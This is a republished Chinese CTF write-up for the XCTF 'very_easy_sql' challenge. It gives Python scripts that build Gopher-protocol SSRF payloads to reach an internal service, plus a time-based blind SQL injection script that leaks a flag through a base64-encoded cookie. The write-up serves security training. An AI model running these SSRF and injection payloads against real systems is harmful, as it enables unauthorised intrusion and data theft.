XCTF_very_easy_sql

这篇具有很好参考价值的文章主要介绍了XCTF_very_easy_sql。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

  • 简单的进行sql注入测试后发现不简单
  • 尝试一下按照提示

XCTF_very_easy_sql,sql,数据库
XCTF_very_easy_sql,sql,数据库
XCTF_very_easy_sql,sql,数据库
XCTF_very_easy_sql,sql,数据库XCTF_very_easy_sql,sql,数据库

  • 结合这句提示
  • 应该是内部访问,所以采用的手段应该是ssrf
  • 顺便看看包
    XCTF_very_easy_sql,sql,数据库
  • 唯一值得关注的是set-cookie
  • 说回ssrf
  • 唯一能使用的方式应该是Gopher协议
  • 找到了一个POST的python脚本
import urllib.parse
 
payload = """
POST /index.php HTTP/1.1
Host: 127.0.0.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 25
uname=admin&passwd=admin
"""
tmp = urllib.parse.quote(payload) 
new = tmp.replace('%0A','%0D%0A')
result = 'gopher://127.0.0.1:80/'+'_'+new 
result = urllib.parse.quote(result)
print(result) #输出结果
 
gopher://127.0.0.1:80/_POST%20/%20HTTP/1.1%0d%0aHost:%20127.0.0.1:80%0d%0aContent-Type:%20application/x-www-form-urlencoded%0d%0aContent-Length:%2023%0d%0a%0d%0auname=rick&passwd=morty%0d%0a
  • 使用burp进行抓包
    XCTF_very_easy_sql,sql,数据库XCTF_very_easy_sql,sql,数据库

XCTF_very_easy_sql,sql,数据库

  • 似乎根据用户名分配cookie
  • 注入点在cookies
  • 构造
import urllib.parse

host = "127.0.0.1:80"
cookie="this_is_your_cookie=YWRtaW4nICM="

test =\
"""GET /index.php HTTP/1.1
Host: {}
Connection: close
Content-Type: application/x-www-form-urlencoded
Cookie:{}

""".format(host,cookie)

tmp = urllib.parse.quote(test) 
new = tmp.replace("%0A","%0D%0A")
result = urllib.parse.quote(new) 
print("gopher://"+host+"/_"+result)


  • 然后进行内部网络盲注爆破字段
import urllib.parse
import requests
import time
import base64

url = "http://61.147.171.105:52686//use.php?url="
flag = ""
for pos in range(1, 50):
    for i in range(33, 127):
        # poc="') union select 1,2,if(1=1,sleep(5),1) # "

        # security
        # poc="') union select 1,2,if(ascii( substr((database()),"+str(pos)+",1) )="+str(i)+",sleep(2),1) # "

        # flag
        # poc="') union select 1,2,if(ascii( substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),"+str(pos)+",1) )="+str(i)+",sleep(2),1) # "

        poc = "') union select 1,2,if(ascii( substr((select * from flag)," + str(pos) + ",1) )=" + str(
            i) + ",sleep(2),1) # "

        bs = str(base64.b64encode(poc.encode("utf-8")), "utf-8")
        final_poc = "gopher://127.0.0.1:80/_GET%20%2findex.php%20HTTP%2f1.1%250d%250aHost%3A%20localhost%3A80%250d%250aConnection%3A%20close%250d%250aContent-Type%3A%20application%2fx-www-form-urlencoded%250d%250aCookie%3A%20this%5Fis%5Fyour%5Fcookie%3D" + bs + "%3B%250d%250a"
        t1 = time.time()
        res = requests.get(url + final_poc)
        t2 = time.time()
        if (t2 - t1 > 2):
            flag += chr(i)
            print(flag)
            break
print(flag)

 - 执行结果

XCTF_very_easy_sql,sql,数据库文章来源地址https://www.toymoban.com/news/detail-619008.html

到了这里,关于XCTF_very_easy_sql的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • SSRF ME XCTF

    就是一个验证框和URL框,两个都必须有参数 做一个粗略的脚本,一般验证码都是数字,所以直接开md5: 需要注意的是,这里面的headers需要加上cookie,不然验证码会一直变。 经过这下面的payload可以知道很多东西: 读到 lib.php 发现它只过滤了flag什么的,所以有以下思路 file

    2023年04月25日
    浏览(32)
  • [XCTF]真是阳间题(难度2)

    用到了CTFcrackTools、CyberChef工具 目录 前言 二、解题工具 1.CTFcrackTools 2.CyberChef 三、解题思路  1.一长串数字 2.16进制字符串 ——Base解密 3.凯撒密码解密  总结 随着难度的进阶(对于本蒟蒻来说1-2)综合性利用各种工具显得很重要 本题没有思路。查看题解之后理清了做题过程

    2024年02月04日
    浏览(30)
  • [XCTF]适合作为桌面(难度1)

    这真的只有难度1吗?作为萌新,难死我了QAQ 目录 前言 一、题目:适合作为桌面 二、解题思路 1.属性? 2.图片图层? 3.图片通道LSB 4.二维码扫描 5.对照ASCII 6.反编译pyc文件 总结 给了一张图片(png),什么提示没有,怎么进行思考获得flag? 事实上,真实的场景自然也不会给

    2023年04月22日
    浏览(97)
  • pytorch 通用训练代码讲解(very good)

    2024年01月19日
    浏览(32)
  • XCTF-Web-catcat-new

    查看题目 访问网址:   点开其中一个cat   观察URL,可以发现URL上使用get请求传递了一个名为file的参数,所以猜测可能存在文件包含漏洞。 在URL上传递参数file=../../../etc/passwd发现存在漏洞 读取当前进程的命令行参数?file=../../../../proc/self/cmdline,发现有一个通过python启动app.

    2024年02月04日
    浏览(23)
  • selenium的新一代替代品---DrissionPage(very 推荐)

    官方文档地址: http://g1879.gitee.io/drissionpagedocs/ DrissionPage 是一个基于 python 的网页自动化工具。 它既能控制浏览器,也能收发数据包,还能把两者合而为一。 可兼顾浏览器自动化的便利性和 requests 的高效率。 它功能强大,内置无数人性化设计和便捷功能。 它的语法简洁而优

    2024年02月11日
    浏览(37)
  • 【聚焦】“饶派杯”XCTF车联网安全挑战赛即将开启!

    为深入贯彻落实国家网络强国和交通强国战略部署,推动智能网联汽车技术与产业发展、加快该领域人才培养、提升行业创新,打造自主可控、自主研发的中国智能网联汽车安全生态体系, 由江西省委网信办、江西省工信厅、上饶市人民政府主办 ,上饶经济技术开发区、上

    2024年02月07日
    浏览(45)
  • 饶派杯XCTF车联网安全挑战赛Reverse GotYourKey

    onCreate方法中判断SDK版本是否=27 然后创建两个线程 第一个线程是接受输入的字符串并发送出去 第二个线程用于接受数据 线程1,就是将字符串转为字节数组发送出去 线程2,作为服务端接受数据并进行处理 这部分主要是用于混淆的代码,很多没有实际作用 有一个方法是根据buff

    2024年02月10日
    浏览(50)
  • XCTF-Misc1 Let_god_knows

    附件是一张图片Let_god_knows.bmp binwalk查看了没有隐藏文件,stegsolve查看通道,第一遍完全没有找到什么不同,LSB隐写我看了一下,实在是没找到突破口,只好去搜一下。 然后就蛮无语的,在red通道0里面居然藏了一个二维码 这个二维码太小了,哪怕截图,都不容易扫描,而且周

    2024年02月02日
    浏览(26)
  • Tomcat 运行报错 This is very likely to create a memory leak

    服务器上某个Tomcat服务运行一段时间后自动停止,查看日志输出,提示: This is very likely to create a memory leak. Stack trace of thread. 查阅资料得知,产生该异常的原因为内存溢出。 在 tomcat目录/bin 下修改 calalina.sh ,添加 JVM 启动参数: 如果遇到无法识别短横杠 - 的问题,则可以使

    2024年02月07日
    浏览(36)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包